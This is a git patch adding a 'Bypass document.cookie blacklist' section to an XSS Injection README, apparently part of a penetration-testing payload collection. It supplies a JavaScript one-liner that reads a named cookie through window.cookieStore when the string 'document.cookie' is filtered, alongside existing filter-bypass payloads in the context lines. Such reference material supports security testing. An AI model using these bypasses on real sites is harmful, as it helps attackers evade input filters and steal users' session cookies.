From 5d561ea7d6e726a326a0bc6baecf245327143fb5 Mon Sep 17 00:00:00 2001
From: Cory Cline <cory@corycline.com>
Date: Thu, 13 Oct 2022 18:23:36 -0500
Subject: [PATCH] Added document.cookie blacklist bypass

Added an alternative to document.cookie for situations when this text is blacklisted.
---
 XSS Injection/README.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 6cb88ea..a079cf6 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
     - [Bypass space filter](#bypass-space-filter)
     - [Bypass email filter](#bypass-email-filter)
     - [Bypass document blacklist](#bypass-document-blacklist)
+    - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist)
     - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string)
     - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect)
     - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert)
@@ -774,6 +775,14 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 window["doc"+"ument"]
 ```
 
+### Bypass document.cookie blacklist
+
+This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
+
+```
+const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);});
+```
+
 ### Bypass using javascript inside a string
 
 ```javascript